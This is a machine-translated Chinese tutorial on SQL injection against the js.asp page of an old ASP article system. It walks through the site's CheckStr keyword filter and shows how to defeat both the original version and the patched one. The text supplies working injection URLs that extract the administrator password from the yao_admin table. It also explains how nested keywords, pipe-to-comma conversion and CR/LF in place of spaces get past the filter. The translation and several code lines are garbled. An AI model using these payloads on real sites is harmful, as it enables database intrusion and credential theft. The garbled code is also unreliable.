Anti-injection code

Here we use the old y system to illustrate the problem. The vulnerability exists in the js. asp file.

If CheckStr (Request ("ClassNo") <> "then
ClassNo = split (CheckStr (Request ("ClassNo"), "| ")
Here we use checkstr to filter variables, but it does not seem to work. Split into Arrays
On error resume next
NClassID = LaoYRequest (ClassNo (0 ))
NClassID1 = LaoYRequest (ClassNo (1 ))
Obtain array 1 and perform integer filtering with array 2. No Vulnerability
End if
Num = LaoYRequest (request. querystring ("num") Here num must be> = 1
.......
Set rs = server. createObject ("Adodb. recordset ")
SQL = "Select top" & num & "ID, Title, TitleFontColor, Author, ClassID, DateAndTime, Hits, IsTop, IsHot from Yao_Article Where yn = 0"
If NclassID <> "and NclassID1 =" "then
If Yao_MyID (NclassID) = "0" then
SQL = SQL & "and ClassID =" & NclassID &""
Else
MyID = Replace ("" & Yao_MyID (NclassID) & "", "| ",",")
SQL = SQL & "and ClassID in (" & MyID & ")" 'in (1, 2, 3)
End if
Elseif NclassID <> "" and NclassID1 <> "" then
MyID = Replace ("" & Request ("ClassNo") & "", "|", ",") 'filters all |, 1 | 1 | 2 | 2 myid =, 2
SQL = SQL & "and ClassID in (" & MyID & ")" 'in (, 2) union select 1, admin_pass, 9 from yao_admin where id in (1)
The problem occurs here. classno is written to the query without any other filtering.
End if

Select case topType
Case "new" SQL = SQL & "order by DateAndTime desc, ID desc"
Case "hot" SQL = SQL & "order by hits desc, ID desc"
Case "IsHot" SQL = SQL & "and IsHot = 1 order by ID desc"
End select
Set rs = conn.exe cute (SQL)
If rs. bof and rs. eof then
Str = str + "no qualified articles"
........
The code is annotated here, mainly because only checkStr filtering is performed on ClassNo and "|" is converted to ",". Here we will take a look at his filtering order, which will be used in the future. The first filter uses the CherckStr function, and then converts "|" to "," With replace. Continue reading the CheckStr Function Code

Function CheckStr (str)
CheckStr = replace (str, "<", "<"), ">", ">"), chr (13 ),""), "","")
CheckStr = replace (CheckStr, "", ""), "and", ""), "insert", ""), "set ", "")
CheckStr = replace (CheckStr, "select", ""), "update", ""), "delete ",""), chr (34 ),"")
CheckStr = replace (CheckStr, "*", ""), "=", ""), "or ",""), "mid", ""), "count ","")
End function

Here, we only leave some common filters empty. Next we can construct the injection code. I have provided the injection code for getting the password.

Js. asp? Num = 1 & ClassNo = 1 | 1 | 1) union select 1, admin_pass, 3, 4, 5, 6, 7, 8, 9 from yao_admin where id in (1

(Because the old code has been lost, there is no way to capture the image. I can see again that the old Code also filters the select statement, but checkstr should not work .)
Now, the previous vulnerability is over. Let's look at his new repair method. Js. asp does not change. It only changes the filter function. The following code:

Function CheckStr (str)
CheckStr = replace (str, "<", "<"), ">", ">"), chr (13 ),""), "","")
CheckStr = replace (CheckStr, "", ""), "and", ""), "insert", ""), "set ", "")
CheckStr = replace (CheckStr, "select", ""), "update", ""), "delete ",""), chr (34 ),"")
CheckStr = replace (CheckStr, "*", ""), "=", ""), "mid", ""), "count ", "")
CheckStr = replace (CheckStr, "%", ""), ""), "union", ""), "where ", "")
End function

The filtering content is added here. The most important thing is that the previous "," is filtered out, and union queries are also added. Now that we know how to fix it, Let's start to make a breakthrough. First, let's talk about the replace filtering process. Suppose we have a string like "123unionunion", and the filtering function is short for CheckStr = replace (CheckStr, "union ",""). The following is the test code.

<%
Function CheckStr (str)
CheckStr = replace (Str, "union ","")
End Function
A = Request ("")
Response. write "the unfiltered string is:" & a & "<br>"
A = CheckStr ()
Response. write "the filtered string is:" &
%>

When a string is filtered, replace checks whether there are strings matching the union. If yes, the filter is empty. Then, "123" is left in the end of the string ". In this way, the SQL statement code is successfully blocked.

But what if we use a string like "123ununionion? When a string is filtered, replace filters out the matched union and then enters the next Execution Code. In this way, the string we just filtered will become a string like "123union, although the union contained in the middle is filtered out, the code we carefully constructed is left blank because of its filtering, bypassing its anti-injection defense line.

Although the first step is to bypass, the path is still very long. For a character like ",", there is no way to add other characters in the middle, so you need to bypass it in other ways. This requires the use of the code I mentioned above. ClassNo is finally filtered by a Replace (SQL, "|. The above js. asp code is annotated. ClassNo is obtained from arrays. The author uses split (CheckStr (Request ("ClassNo") and "|") to segment arrays. If we write "|", what is the last SQL statement displayed?

I add the above Code to the source code to display SQL statements.

As you can see, when we write "|", the data imported to SQL becomes the above Replace (SQL, "|.
Now the main content is bypassed. Let's test it.
Http://www.bkjia.com/js.asp? Num = 1 & ClassNo = 1 | 1 | 1) % 20 unwhereion % 20 selewherect % 201 | admin_pass | 3 | 4 | 5 | 6 | 7 | 8 | 9% 20 from % 20yao_admin % 20 wherwheree % 20id % 20in (1

As we thought, the Code is not executed because spaces are filtered out. So let's continue to make breakthroughs. The predecessors summarized how to execute SQL statements by bypassing space filtering. But for the access database, we press ENTER's ascii code (% 0D % 0A % 0D % 0A) to bypass.

The administrator password we need is obtained by bypassing the anti-injection code.